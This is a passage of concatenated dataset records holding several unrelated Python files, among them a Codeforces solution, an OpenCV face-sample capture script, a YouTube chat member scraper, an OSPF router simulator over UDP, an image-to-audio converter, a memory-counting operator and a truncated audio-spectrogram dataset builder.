setattr(\n self, k, \n property(partialmethod(self.__get_data, key=k))\n )\n else:\n raise errors.DataError(\"{} Schema is incorrect!\".format(sub_name))\n\n @staticmethod\n def check_row_schema(**row_dict : dict) -> bool:\n raise NotImplementedError\n\n @staticmethod\n def get_readonly_attr_names() -> tuple:\n raise NotImplementedError\n\n def __get_data(self, key:str='', default:any=None) -> any:\n return self._row_dict[key] if key in self._row_dict else default\n\n def __set_data(self, key:str='', val:any=None):\n if key in self._row_dict:\n self._row_dict[key] = val\n\n def toDict(self):\n return self._row_dict\n\n def toTuple(self):\n return tuple(self._row_dict.values())\n\n # def getQueryStr(self):\n # res = StringIO('')\n # for k in self._row_dict.keys():\n # res.write(\"%({})s,\".format(k))\n # return res.getvalue()\n","sub_path":"weight/weight_be/weights/db/models/modelBase.py","file_name":"modelBase.py","file_ext":"py","file_size_in_byte":1717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"643762321","text":"#https://codeforces.com/problemset/problem/492/B\n\nn,l = input().split(' ')\n\nlocations= list(map(int,list(input().split(' '))))\nlocations.sort()\n\nmax_range=0\ntoCompare=locations[0]\n\nfor i in locations[1:]:\n if(i-toCompare>max_range):\n max_range= i-toCompare\n toCompare=i\n\nmax1=max_range/2\nmax2=locations[0]\nmax3=int(l)-locations[-1]\nif(max1>max2 and max1>max3):\n print(max1)\nelif(max2>max3):\n print(max2)\nelse:\n print(max3)\n\n","sub_path":"CodeForces/B. Vanya and Lanterns.py","file_name":"B. Vanya and Lanterns.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"20823301","text":"import cv2\r\nfrom PIL import Image\r\ncam = cv2.VideoCapture(0)\r\ndetector=cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\nId=int(input('enter your id: '))\r\n \r\nsampleNum=0\r\nwhile(True):\r\n ret, img = cam.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = detector.detectMultiScale(gray, 1.3, 5)\r\n for (x,y,w,h) in faces:\r\n cv2.rectangle(img,(x,y),(x+w,y+h),(0,255,255),2)\r\n \r\n #incrementing sample number \r\n sampleNum=sampleNum+1\r\n #saving the captured face in the dataset folder\r\n cv2.imwrite(\"[Put location to store images here]\"+str(Id) +'.'+ str(sampleNum) + \".jpg\", gray[y:y+h,x:x+w])\r\n\r\n cv2.imshow('frame',img)\r\n #wait for 100 miliseconds \r\n cv2.waitKey(100);\r\n if sampleNum>40:\r\n break\r\ncam.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"facecam.py","file_name":"facecam.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"389248380","text":"import pytchat\n\nlist_dic = \"F:/(member_lists)/\"\noutf = open(list_dic + \"gura_members2.csv\",\"w\", encoding=\"utf-8\")\n\nvideo_id = 'hD6LwW7Zkf8'\nchat = pytchat.create(video_id=video_id)\n\nmember_list = {}\ntry:\n while chat.is_alive():\n for c in chat.get().items:\n if c.author.badgeUrl:\n member_list[c.author.name] = c.author.channelUrl\n print(len(member_list))\nexcept :\n print(\"name,channel\", file=outf)\n for k in member_list:\n print(k, member_list[k], sep=\",\",file=outf)\nfinally:\n print(\"name,channel\", file=outf)\n for k in member_list:\n print(k, member_list[k], sep=\",\",file=outf)","sub_path":"chat_capture/chat_capture.py","file_name":"chat_capture.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"68467401","text":"import argparse\nimport socket\nfrom random import randint\nfrom numpy import zeros\nfrom sys import maxsize\nimport threading\nfrom datetime import datetime\nimport os\nfrom graphviz import Graph\n\nlocal_IP = \"127.0.0.1\"\nport_Prefix = 10000\nBUFFER_SIZE = 1024\n\n\ndef setInterval(interval):\n def decorator(function):\n def wrapper(*args, **kwargs):\n stopped = threading.Event()\n\n def loop(): # executed in another thread\n while not stopped.wait(interval): # until stopped\n function(*args, **kwargs)\n\n t = threading.Thread(target=loop)\n t.daemon = True # stop if the program exits\n t.start()\n return stopped\n return wrapper\n return decorator\n\n\nclass Router:\n def __init__(self, id, infile, outfile, hello, lsa, spf, log_level):\n self.id = id\n self.infile = infile\n self.outfile = outfile\n self.hello = hello\n self.lsa = lsa\n self.spf = spf\n self.log_level = log_level\n self.neighbours = {}\n self.seq_nums = {}\n self.seq_no = 0\n self.lock = threading.Lock()\n self.parse_infile()\n\n def parse_infile(self):\n # Read infile and get lines\n infile = open(self.infile, \"r\")\n lines = infile.readlines()\n\n # Split string and set values\n t1, t2 = lines[0].split(\",\")\n self.routers = int(t1)\n self.edges = int(t2)\n with self.lock:\n self.graph = zeros((self.routers, self.routers))\n\n # Read lines and set neighbours\n for idx in range(1, self.edges+1):\n i, j, mini, maxi = lines[idx].split(\",\")\n if(int(i) == self.id):\n self.neighbours[int(j)] = (int(mini), int(maxi))\n elif(int(j) == self.id):\n self.neighbours[int(i)] = (int(mini), int(maxi))\n else:\n pass\n\n def send_msg(self, id, msg):\n UDPClientSocket = socket.socket(\n family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.sendto(str.encode(\n f\"{self.id},\"+msg), (local_IP, id+port_Prefix))\n self.debug(1, f\"Message sent on {id} : {msg}\")\n\n def receive_msg(self):\n \"\"\"\n Starts the UDP server at port (port_Prefix + id) and waits to receive packets.\n \"\"\"\n # Start the udp server\n UDPServerSocket = socket.socket(\n family=socket.AF_INET, type=socket.SOCK_DGRAM)\n # Bind the server with port (port_Prefix + id)\n UDPServerSocket.bind((local_IP, port_Prefix + self.id))\n self.debug(2, f\"UDP server started on {port_Prefix+self.id}\")\n\n # Wait for receiving packets\n while True:\n bytesAddressPair = UDPServerSocket.recvfrom(BUFFER_SIZE)\n message = str(bytesAddressPair[0], \"utf-8\")\n first_comma = message.find(',')\n rcv_id = int(message[:first_comma])\n self.debug(1, f\"Received message from {rcv_id} : {message}\")\n message = message[first_comma+1:]\n\n # Check the message and process accordingly\n if(message[:message.find(',')] == \"HELLO\"):\n self.send_hello_reply(message, rcv_id)\n elif(message.startswith(\"HELLOREPLY\")):\n self.accept_hello_reply(message, rcv_id)\n elif(message.startswith(\"LSA\")):\n self.receive_lsa(message, rcv_id)\n else:\n raise ValueError(\n f\"Incorrect msg received : {message} from {rcv_id}\")\n\n def send_hello(self):\n for id in self.neighbours:\n self.send_msg(id, f\"HELLO,{self.id}\")\n\n def send_hello_reply(self, msg, rcv_router_id):\n rcv_id = int(msg.split(',')[1])\n if(rcv_id != rcv_router_id):\n raise KeyError(\n f\"Receiver id {rcv_router_id} != id in msg {rcv_id}\")\n new_cost = randint(\n self.neighbours[rcv_id][0], self.neighbours[rcv_id][1])\n self.send_msg(rcv_id, f\"HELLOREPLY,{self.id},{rcv_id},{new_cost}\")\n with self.lock:\n self.graph[self.id, rcv_id] = new_cost\n self.debug(2, f\"HELLO ACK to {rcv_id} with cost {new_cost}\")\n\n def accept_hello_reply(self, msg, rcv_router_id):\n tokens = msg.split(',')\n j, i, linkij = int(tokens[1]), int(tokens[2]), int(tokens[3])\n if(j != rcv_router_id):\n raise KeyError(f\"Receiver id {rcv_router_id} != id in msg {j}\")\n if(i != self.id):\n raise KeyError(\n f\"Incorrect message received. Directed to {i} received by {self.id}\")\n with self.lock:\n self.graph[i][j] = int(linkij)\n self.debug(2, f\"HELLO ACK received from {j} with cost {linkij}\")\n\n def send_lsa(self):\n self.seq_no += 1\n msg = f\"LSA,{self.id},{self.seq_no},\"\n neighs = 0\n lsa_suffix = \"\"\n for r in range(self.routers):\n with self.lock:\n if(self.graph[self.id][r] != maxsize):\n lsa_suffix += f\",{r},{int(self.graph[self.id][r])}\"\n neighs += 1\n\n msg += f\"{neighs}{lsa_suffix}\"\n\n for n in range(self.routers):\n self.send_msg(n, msg)\n self.debug(2, f\"LSA sent to {n}\")\n\n def receive_lsa(self, msg, rcv_router_id):\n tokens = msg.split(',')\n srcid = int(tokens[1])\n seq_num = int(tokens[2])\n entries = int(tokens[3])\n self.debug(2, f\"LSA received from {srcid}\")\n\n if srcid not in self.seq_nums.keys():\n self.seq_nums[srcid] = 0\n if(seq_num <= self.seq_nums[srcid]):\n return\n\n self.seq_nums[srcid] = seq_num\n for i in range(entries):\n neigh = int(tokens[4+2*i])\n cost = int(tokens[5+2*i])\n with self.lock:\n self.graph[srcid][neigh] = cost\n\n # Forward this message to all the neighbours except the rcv_router\n for n in self.neighbours:\n if(n != rcv_router_id):\n self.send_msg(n, msg)\n self.debug(2, f\"LSA forwarded to {n}\")\n\n def debug(self, status, msg):\n if(status <= self.log_level):\n if(status >= 2):\n print(\n f\"[\\033[0;32mDEBUG\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n elif(status == 1):\n print(\n f\"[\\033[0;33mINFO\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n else:\n print(\n f\"[\\033[0;34mMSG\\033[0m Router-{self.id} {datetime.now().strftime('%H:%M:%S')}] : {msg}\")\n\n def minDistance(self, dist, sptSet):\n\n # Initilaize minimum distance for next node\n mini = maxsize\n min_index = -1\n # Search not nearest vertex not in the\n # shortest path tree\n for v in range(self.routers):\n if dist[v] < mini and sptSet[v] == False:\n mini = dist[v]\n min_index = v\n\n return min_index\n\n def getPath(self, j):\n if self.parent[j] == -1:\n return str(j)\n return self.getPath(self.parent[j]) + \"->\" + str(j)\n\n def dijkstra(self):\n dist = [maxsize] * self.routers\n dist[self.id] = 0\n sptSet = [False] * self.routers\n self.parent = [-1] * self.routers\n\n for _ in range(self.routers):\n u = self.minDistance(dist, sptSet)\n sptSet[u] = True\n for v in range(self.routers):\n with self.lock:\n if ((self.graph[u][v] > 0) and\n (sptSet[v] == False) and\n (dist[v] > dist[u] + self.graph[u][v])):\n dist[v] = dist[u] + self.graph[u][v]\n self.parent[v] = u\n\n self.dist = dist\n\n def plotGraph(self):\n def get_name(a, b): return f\"start_{b}\" if (a == b) else f\"router_{a}\"\n\n g = Graph(self.outfile.replace(\".txt\", \"\"), filename=self.outfile.replace(\".txt\", \".gv\"),\n engine='sfdp', strict=True)\n g.attr('node', style='filled', color=\"lightblue\")\n\n with g.subgraph(name='shortest_path') as c:\n for i in range(self.routers):\n if(self.parent[i] != -1):\n c.edge(get_name(self.parent[i], self.id), get_name(\n i, self.id), label=f\"{int(self.graph[self.parent[i]][i])}\", color=\"green\")\n\n for i in range(self.routers):\n for j in range(i+1, self.routers):\n if self.graph[i][j] != 0:\n g.edge(get_name(i, self.id), get_name(\n j, self.id), label=f\"{int(self.graph[i][j])}\")\n\n g.render(filename=self.outfile.replace(\".txt\", \"\"), format=\"png\")\n\n def write_outfile(self):\n outfile = open(self.outfile, \"a\")\n outfile.write(f\"{self.id},{datetime.now().strftime('%H:%M:%S')}\\n\")\n for r in range(self.routers):\n if(r != self.id):\n outfile.write(f\"{r},{self.getPath(r)},{int(self.dist[r])}\\n\")\n self.debug(2, f\"Outfile updated by {self.id}\")\n\n def spf_thread_fn(self):\n self.dijkstra()\n self.debug(1, \"Shortest paths updated.\")\n self.write_outfile()\n self.debug(3, self.graph)\n self.plotGraph()\n\n def start_router(self):\n self.debug(2, \"Router started\")\n t1 = threading.Thread(target=self.receive_msg)\n t1.start()\n self.debug(2, \"Server started\")\n\n @setInterval(self.hello)\n def fun1(): self.send_hello()\n\n @setInterval(self.lsa)\n def fun2(): self.send_lsa()\n\n @setInterval(self.spf)\n def fun3(): self.spf_thread_fn()\n\n t2 = fun1()\n self.debug(2, \"Hello thread started\")\n\n t3 = fun2()\n self.debug(2, \"LSA thread started\")\n\n t4 = fun3()\n self.debug(2, \"SPF thread started\")\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=\"Program to simulate a router using OSPF routing algorithm.\")\n parser.add_argument('-i', '--id', type=int,\n help=\"id of the router\", required=True)\n parser.add_argument('-o', '--outfile', type=str,\n help=\"outfile for the graph\")\n parser.add_argument('-f', '--infile', type=str,\n help=\"infile for the graph. default = infile.txt\", default=\"infile.txt\")\n parser.add_argument('-H', '--hello_interval', type=int,\n help=\"HELLO interval for OSPF. default = 3\", default=3)\n parser.add_argument('-a', '--lsa_interval', type=int,\n help=\"LSA interval for OSPF. default = 4\", default=4)\n parser.add_argument('-s', '--spf_interval', type=int,\n help=\"SPF interval for OSPF. default = 10\", default=10)\n parser.add_argument('-l', '--log_level', type=int,\n help=\"Logging level for debugging messages. default = 1\", default=1)\n\n args = parser.parse_args()\n if(args.outfile == None):\n os.makedirs(\"outputs\", exist_ok=True)\n args.outfile = f\"outputs/outfile-{args.id}.txt\"\n\n return args\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n\n r = Router(args.id, args.infile, args.outfile,\n args.hello_interval, args.lsa_interval, args.spf_interval, args.log_level)\n r.start_router()\n","sub_path":"Assignment3/ospf.py","file_name":"ospf.py","file_ext":"py","file_size_in_byte":11427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"592092935","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport pyaudio\nimport wave\n\ndef mostrarImagenInicialEstandard(nombre, x,y):\n imagen = cv2.imread(nombre)\n imagenStandard = cv2.resize(imagen, (x,y))\n cv2.imshow(\"Imagen a Convertir\",imagenStandard) \n return imagenStandard\n\ndef obtenerMatricesBGR(imagenStandard, x,y):\n b = np.zeros((y,x))\n g = np.zeros((y,x))\n r = np.zeros((y,x))\n\n for n in list(range(y)):\n for m in list(range(x)):\n b[n][m] = ((imagenStandard[n][m])[0]) \n g[n][m] = ((imagenStandard[n][m])[1]) \n r[n][m] = ((imagenStandard[n][m])[2]) \n\n cv2.imwrite(\"recursosImg/rgb/blue.jpg\", b)\n cv2.imwrite(\"recursosImg/rgb/green.jpg\", g)\n cv2.imwrite(\"recursosImg/rgb/red.jpg\", r)\n\n bgr = [b,g,r]\n return bgr\n\ndef obtenerPixelLbp(color, n, m):\n exponente = 0\n exponentes = [6,7,0,1,2,3,4,5]\n pixelLpbB = 0\n pixelLpbG = 0\n pixelLpbR = 0\n valorCentral0 = (color[0])[n][m]\n valorCentral1 = (color[1])[n][m]\n valorCentral2 = (color[2])[n][m]\n\n for k in list(range(n-1,n+2)):\n for j in list(range(m-1,m+2)):\n if k != n and j != m:\n if (color[0])[k][j] <= valorCentral0:\n pixelLpbB = pixelLpbB + pow(2,exponentes[exponente])\n if (color[1])[k][j] <= valorCentral1:\n pixelLpbG = pixelLpbG + pow(2,exponentes[exponente])\n if (color[2])[k][j] <= valorCentral2:\n pixelLpbR = pixelLpbR + pow(2,exponentes[exponente])\n exponente = exponente+1\n\n return [pixelLpbB,pixelLpbB,pixelLpbR] \n\ndef obtenerColor(imagenStandard, n , m):\n color =[ 0,0,0]\n for k in list(range(n-1,n+2)):\n for j in list(range(m-1,m+2)):\n color[0] = color[0]+(imagenStandard[n][m])[0] \n color[1] = color[1]+(imagenStandard[n][m])[1] \n color[2] = color[2]+(imagenStandard[n][m])[2]\n\n color = [int(color[0]/9),int(color[1]/9),int(color[2]/9)]\n\n return color\n\ndef obtenerValoresConversion(imagenStandard,bgr,x,y, compresionNumber):\n cn = 0\n matOrigen= bgr\n valoresConversion=[]\n\n while cn <= compresionNumber:\n puntosX = int((x-1)/3)\n puntosY = int((y-1)/3)\n\n lbpB = np.zeros((puntosY ,puntosX))\n lbpG = np.zeros((puntosY ,puntosX))\n lbpR = np.zeros((puntosY ,puntosX))\n #colores = np.ndarray((puntosY ,puntosX))\n colores = x = [[ [0,0,0] for i in range(puntosX)] for j in range(puntosY)]\n\n if cn == compresionNumber:\n lbpU = np.zeros((puntosY ,puntosX))\n lbpF = np.zeros((puntosY ,puntosX)) \n canal = np.zeros((puntosY ,puntosX)) \n\n view = np.zeros((puntosY ,puntosX))\n\n sonidoPorPixelI = np.zeros((puntosY ,puntosX))\n sonidoPorPixelF = np.zeros((puntosY ,puntosX))\n sonidoPorPixelM = np.zeros((puntosY ,puntosX))\n\n for n in list(range(1,puntosY +1)):\n for m in list(range(1,puntosX +1)):\n o = 0\n p = 0\n if m != 1:\n o = 3\n if n != 1:\n p = 3\n lbpS = obtenerPixelLbp(matOrigen, n+p, m+o) \n lbpB[n-1][m-1] = lbpS[0]\n lbpG[n-1][m-1] = lbpS[1]\n lbpR[n-1][m-1] = lbpS[2]\n\n colores[n-1][m-1]= obtenerColor(imagenStandard,n+p,m+o)\n \n if cn == compresionNumber:\n d = colores[n-1][m-1]#revisar\n\n lbpU[n-1][m-1] = lbpB[n-1][m-1] +lbpG[n-1][m-1] +lbpR[n-1][m-1] \n lbpF[n-1][m-1] = lbpU[n-1][m-1] + d[0] + d[1]+ d[2]\n view[n-1][m-1] = (lbpF[n-1][m-1]) *0.166\n \n\n sonidoPorPixelI[n-1][m-1] = 40+9*lbpF[n-1][m-1]+lbpF[n-1][m-1]\n sonidoPorPixelF[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +9\n sonidoPorPixelM[n-1][m-1] = sonidoPorPixelI[n-1][m-1] +4\n\n print(\"testo\")\n print(d[0])\n print(d[1])\n print(d[2])\n\n if d[0]> d[1] and d[0] > d[2]:\n canal[n-1][m-1] = 0\n elif d[2] > d[1] and d[2] > d[0]:\n canal[n-1][m-1] = 2\n else:\n canal[n-1][m-1] = 1\n\n print(\"canal\")\n print(canal[n-1][m-1])\n print(canal)\n\n valoresConversion = [lbpB,lbpG,lbpR, lbpU,lbpF, canal, sonidoPorPixelI, sonidoPorPixelF, sonidoPorPixelM, puntosX,puntosY]\n\n matOrigen = [lbpB,lbpG,lbpR]\n x = puntosX\n y = puntosY\n imagenStandard = colores\n cn = cn+1 \n\n print(lbpF)\n print(\"el toro\")\n print(lbpU)\n\n cv2.imwrite(\"recursosImg/lpbs/lbpBC.jpg\", lbpB)\n cv2.imwrite(\"recursosImg/lpbs/lbpGC.jpg\", lbpG)\n cv2.imwrite(\"recursosImg/lpbs/lbpRC.jpg\", lbpR)\n cv2.imwrite(\"recursosImg/lpbs/lbpUC.jpg\", lbpU)\n cv2.imwrite(\"recursosImg/lpbs/lbpFC.jpg\", lbpF)\n cv2.imwrite(\"recursosImg/viewBWC.jpg\", view)\n\n return valoresConversion\n\ndef onda(frecuencia, duracion, rate=44100):\n duracion = int(duracion * rate)\n factor = float(frecuencia) * (math.pi * 2) / rate\n return np.sin(np.arange(duracion) * factor)\n\ndef reproducir(stream, senial):\n partes = []\n partes.append(senial)\n\n parte =np.concatenate(partes) * 0.25\n stream.write(parte.astype(np.float32).tostring())\n\n#if __name__ == '__main__':\n\ndef obtenerSonidoDeImagen(valoresConversion, numSeg):\n sonidoF = []\n print(valoresConversion[9])\n print(valoresConversion[10])\n sonidoPorPixelM = valoresConversion[8]\n canal = valoresConversion[5]\n print(canal)\n cv2.waitKey(0)\n\n p = pyaudio.PyAudio()\n stream = p.open(format=pyaudio.paFloat32,channels=1, rate=44100, output=1)\n for n in list(range(valoresConversion[10])):\n for m in list(range(valoresConversion[9])): \n print(n)\n print(m)\n print(sonidoPorPixelM[n][m])\n print(canal[n][m])\n\n senial = onda(sonidoPorPixelM[n][m],numSeg/(valoresConversion[9]*valoresConversion[10]))\n senial2 = onda(40,numSeg/(valoresConversion[9]*valoresConversion[10]))\n\n if canal[n][m] == 0 :\n senial_stereo = np.ravel(np.column_stack((senial,senial2)))\n elif canal[n][m] == 1:\n senial_stereo = np.ravel(np.column_stack((senial,senial)))\n else:\n senial_stereo = np.ravel(np.column_stack((senial2,senial)))\n\n reproducir(stream,senial_stereo )\n\n stream.close()\n p.terminate()\n\n return sonidoF\n\ndef inicio(nombreImagen, numSeg, x, y,compresionNumber):\n img = mostrarImagenInicialEstandard(nombreImagen, x,y)\n bgr = obtenerMatricesBGR(img, x,y)\n valoresConversion= obtenerValoresConversion(img,bgr,x,y,compresionNumber)\n\n sonidoDeImagen = obtenerSonidoDeImagen(valoresConversion, numSeg)\n cv2.waitKey(0)\n\n#inicio(\"srcImagenes/carito.jpg\", 60, 200,150, 3)\ninicio(\"srcImagenes/andy.jpg\", 15, 400,300, 2)\n\nprint(\"Graciassss TOTALES!!\")\n","sub_path":"ITSP.py","file_name":"ITSP.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"100561602","text":"# Copyright (c) 2015-2018 by the parties listed in the AUTHORS file.\n# All rights reserved. Use of this source code is governed by\n# a BSD-style license that can be found in the LICENSE file.\n\nimport re\n\nimport numpy as np\n\nfrom ..mpi import MPI\nfrom ..op import Operator\nfrom ..dist import Comm, Data\nfrom .tod import TOD\nfrom .. import rng as rng\n\n\nclass OpMemoryCounter(Operator):\n \"\"\"\n Operator which loops over the TOD objects and computes the total\n amount of memory allocated.\n\n Args:\n silent (bool): Only count and return the memory without\n printing.\n *other_caching_objects: Additional objects that have a cache\n member and user wants to include in the total counts\n (e.q. DistPixels objects).\n \"\"\"\n\n def __init__(self, *other_caching_objects, silent=False):\n\n self._silent = silent\n self._objects = []\n\n for obj in other_caching_objects:\n self._objects.append(obj)\n\n super().__init__()\n\n def exec(self, data):\n \"\"\"\n Count the memory\n\n Args:\n data (toast.Data): The distributed data.\n \"\"\"\n # the two-level pytoast communicator\n comm = data.comm\n # the global communicator\n cworld = comm.comm_world\n # the communicator within the group\n cgroup = comm.comm_group\n # the communicator with all processes with\n # the same rank within their group\n crank = comm.comm_rank\n\n tot_task = 0\n\n for obj in self._objects:\n try:\n tot_task += obj.cache.report(silent=True)\n except:\n pass\n try:\n tot_task += obj._cache.report(silent=True)\n except:\n pass\n\n for obs in data.obs:\n tod = obs['tod']\n tot_task += tod.cache.report(silent=True)\n\n tot_group = 0\n if cgroup is not MPI.UNDEFINED:\n tot_group = cgroup.allreduce(tot_task, op=MPI.SUM)\n tot_world = cworld.allreduce(tot_task, op=MPI.SUM)\n\n tot_task_max = cworld.allreduce(tot_task, op=MPI.MAX)\n tot_group_max = cworld.allreduce(tot_group, op=MPI.MAX)\n\n if cworld.rank == 0 and not self._silent:\n print()\n print('Memory usage statistics: ')\n print('- Max memory (task): {:.2f} GB'.format(\n tot_task_max / 2**30))\n print('- Max memory (group): {:.2f} GB'.format(\n tot_group_max / 2**30))\n print('Total memory: {:.2f} GB'.format(tot_world / 2**30))\n print('', flush=True)\n\n return tot_world\n","sub_path":"src/python/tod/memorycounter.py","file_name":"memorycounter.py","file_ext":"py","file_size_in_byte":2649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"475009096","text":"import logging\nimport os\nimport numpy as np\nfrom argparse import ArgumentParser\nfrom scipy.signal import decimate, spectrogram, get_window\nfrom librosa.core import amplitude_to_db\nfrom pydub import AudioSegment, effects\nfrom h5py import File\nfrom src.errors import ResamplingError\nfrom src.DBManager import DBManager\nfrom src.AudioBooksManager import AudioBooksManager\nfrom src.NoiseManager import NoiseManager\n\nlogger = logging.getLogger('DataConverter')\n\n\nclass DataManager:\n def __init__(self):\n self.__INPUT_SAMPLING_RATE = int(11025)\n self.__N_SAMPLES_WINDOW = int(1024)\n self.__N_SAMPLES_OVERLAP = int(0.5*self.__N_SAMPLES_WINDOW)\n self.__WINDOW = 'hann'\n self.__CHROME_DRIVER_PATH = r\"resources/chromedriver\"\n\n self.__db = DBManager()\n self.__audio_manager = AudioBooksManager(self.__db, self.__CHROME_DRIVER_PATH)\n self.__noise_manager = NoiseManager(self.__db)\n\n def main(self, filename='', mode='', download=0, noises=[], limit=0):\n try:\n if download:\n logging.info('Downloading audio books for training model')\n self.__audio_manager.downloadData()\n logging.info('Downloading noise audios for training model')\n self.__noise_manager.downloadData()\n logging.info('Retrieving audio-noise combinations')\n file_combinations = self.__db.modelTrainGetCombination(self.__INPUT_SAMPLING_RATE, noises, limit)\n with File(filename, mode) as f:\n logging.info('Creating group for SPS:%d and FFT:%d' % (self.__INPUT_SAMPLING_RATE,\n self.__N_SAMPLES_WINDOW))\n main_group = f.create_group(np.string_('SPS%dFFT%d' % (self.__INPUT_SAMPLING_RATE,\n self.__N_SAMPLES_WINDOW)))\n main_group.attrs.create(np.string_('SAMPLE_RATE'), np.string_(self.__INPUT_SAMPLING_RATE))\n main_group.attrs.create(np.string_('FFT_SIZE'), np.string_(self.__N_SAMPLES_WINDOW))\n for idx, file_combination in enumerate(file_combinations):\n try:\n logging.info('Loading data')\n clean_info = self.__db.audioBookGetById(file_combination[1])\n clean = self.load_audio(clean_info[0][9], normalized=False)\n if idx > 0:\n if file_combination[2] != file_combinations[idx - 1][2]:\n noise_info = self.__db.noiseGetById(file_combination[2])\n noise = self.load_audio(noise_info[0][3], normalized=False)\n else:\n noise_info = self.__db.noiseGetById(file_combination[2])\n noise = self.load_audio(noise_info[0][3], normalized=False)\n\n if clean.duration_seconds > noise.duration_seconds:\n logging.info('Clipping clean audio to fit noise audio duration')\n clean = clean[:noise.duration_seconds]\n\n logging.info('Overlaying noise and clean audios')\n dirty = clean.overlay(noise)\n clean_samples = np.array(clean.get_array_of_samples(), dtype=np.float32)\n clean_sampling_rate = clean.frame_rate\n dirty_samples = np.array(dirty.get_array_of_samples(), dtype=np.float32)\n dirty_sampling_rate = dirty.frame_rate\n logging.info('Processing data')\n dirty_freq, dirty_time, dirty_db, dirty_phase = self.__prepateInput(dirty_samples,\n dirty_sampling_rate)\n clean_freq, clean_time, clean_db, clean_phase = self.__prepateInput(clean_samples,\n clean_sampling_rate)\n logging.info('Storing data')\n self.__store_h5_data(main_group, file_combination, clean_info[0], noise_info[0],\n clean_freq, clean_time, clean_db, clean_phase,\n dirty_freq, dirty_time, dirty_db, dirty_phase)\n except ResamplingError as e:\n logging.warning(str(e), exc_info=True)\n\n except Exception as e:\n logging.error(str(e), exc_info=True)\n raise\n\n def __resample(self, input_signal, input_sampling_rate):\n if input_sampling_rate % self.__INPUT_SAMPLING_RATE:\n raise ResamplingError('Downsampling factor is not integer number\\n'\n '\\tInput sampling rate: %d\\n' % input_sampling_rate +\n '\\tTarget sampling rate: %d\\n' % self.__INPUT_SAMPLING_RATE)\n factor = input_sampling_rate / self.__INPUT_SAMPLING_RATE\n logger.info('Input sampling rate is different from the expected by the model.\\n' +\n '\\rInput sampling rate: ' + str(input_sampling_rate) + '\\n' +\n '\\rModel sampling rate: ' + str(self.__INPUT_SAMPLING_RATE) + '\\n' +\n 'Resampling input signal by factor: ' + str(factor))\n in_signal = decimate(input_signal, int(factor))\n return in_signal\n\n def __prepateInput(self, input_signal, sampling_rate):\n if sampling_rate != self.__INPUT_SAMPLING_RATE:\n input_signal = self.__resample(input_signal, sampling_rate)\n freq, time, stft = spectrogram(\n input_signal, fs=self.__INPUT_SAMPLING_RATE,\n window=get_window(self.__WINDOW, self.__N_SAMPLES_WINDOW),\n # nperseg=None,\n noverlap=self.__N_SAMPLES_OVERLAP, nfft=self.__N_SAMPLES_WINDOW,\n # detrend='constant',\n return_onesided=True, scaling='spectrum', axis=-1, mode='complex')\n db_values = amplitude_to_db(np.abs(stft))\n db_values = np.transpose(db_values)[:, np.newaxis, :]\n phase = np.angle(stft)\n return [freq, time, db_values, phase]\n\n def __store_h5_data(self, main_group, file_combination, clean_info, noise_info,\n clean_freq, clean_time, clean_db, clean_phase,\n dirty_freq, dirty_time, dirty_db, dirty_phase):\n combination_group = main_group.create_group(np.string_('COMBINATION@ID_%d' % file_combination[0]))\n combination_group.attrs.create(np.string_('COMBINATION@ID'), np.int32(file_combination[0]))\n combination_group.attrs.create(np.string_('COMBINATION@SAMPLE_RATE'), np.float64(self.__INPUT_SAMPLING_RATE))\n combination_group.attrs.create(np.string_('CLEAN@ID'), np.int32(clean_info[0]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_DUMMY_NAME'), np.string_(clean_info[1]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_NAME'), clean_info[2])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_AUTHOR'), clean_info[3])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_URL'), np.string_(clean_info[4]))\n combination_group.attrs.create(np.string_('CLEAN@BOOK_LANGUAGE'), clean_info[5])\n combination_group.attrs.create(np.string_('CLEAN@BOOK_N_TRACK'), np.int32(clean_info[7]))\n combination_group.attrs.create(np.string_('CLEAN@TRACK_NAME'), np.string_(clean_info[8]))\n combination_group.attrs.create(np.string_('CLEAN@TRACK_SAMPLE_RATE'), np.float64(clean_info[11]))\n combination_group.attrs.create(np.string_('NOISE@ID'), np.int32(noise_info[0]))\n combination_group.attrs.create(np.string_('NOISE@NAME'), noise_info[1])\n combination_group.attrs.create(np.string_('NOISE@URL'), np.string_(noise_info[2]))\n combination_group.attrs.create(np.string_('NOISE@ORIGINAL_N_CHANNEL'), np.int8(noise_info[4]))\n combination_group.attrs.create(np.string_('NOISE@ORIGINAL_SAMPLE_RATE'), np.float64(noise_info[5]))\n clean_group = combination_group.create_group(r'CLEAN')\n clean_group.create_dataset('FREQ', data=clean_freq)\n clean_group.create_dataset('TIME', data=clean_time)\n clean_group.create_dataset('DB', data=clean_db)\n clean_group.create_dataset('PHASE', data=clean_phase)\n clean_group.attrs.create(np.string_('FFT@SIZE'), np.int32(self.__N_SAMPLES_WINDOW))\n clean_group.attrs.create(np.string_('FFT@N_SAMPLES_OVERLAP'), np.int32(self.__N_SAMPLES_OVERLAP))\n clean_group.attrs.create(np.string_('FFT@WINDOW'), np.string_(self.__WINDOW))\n dirty_group = 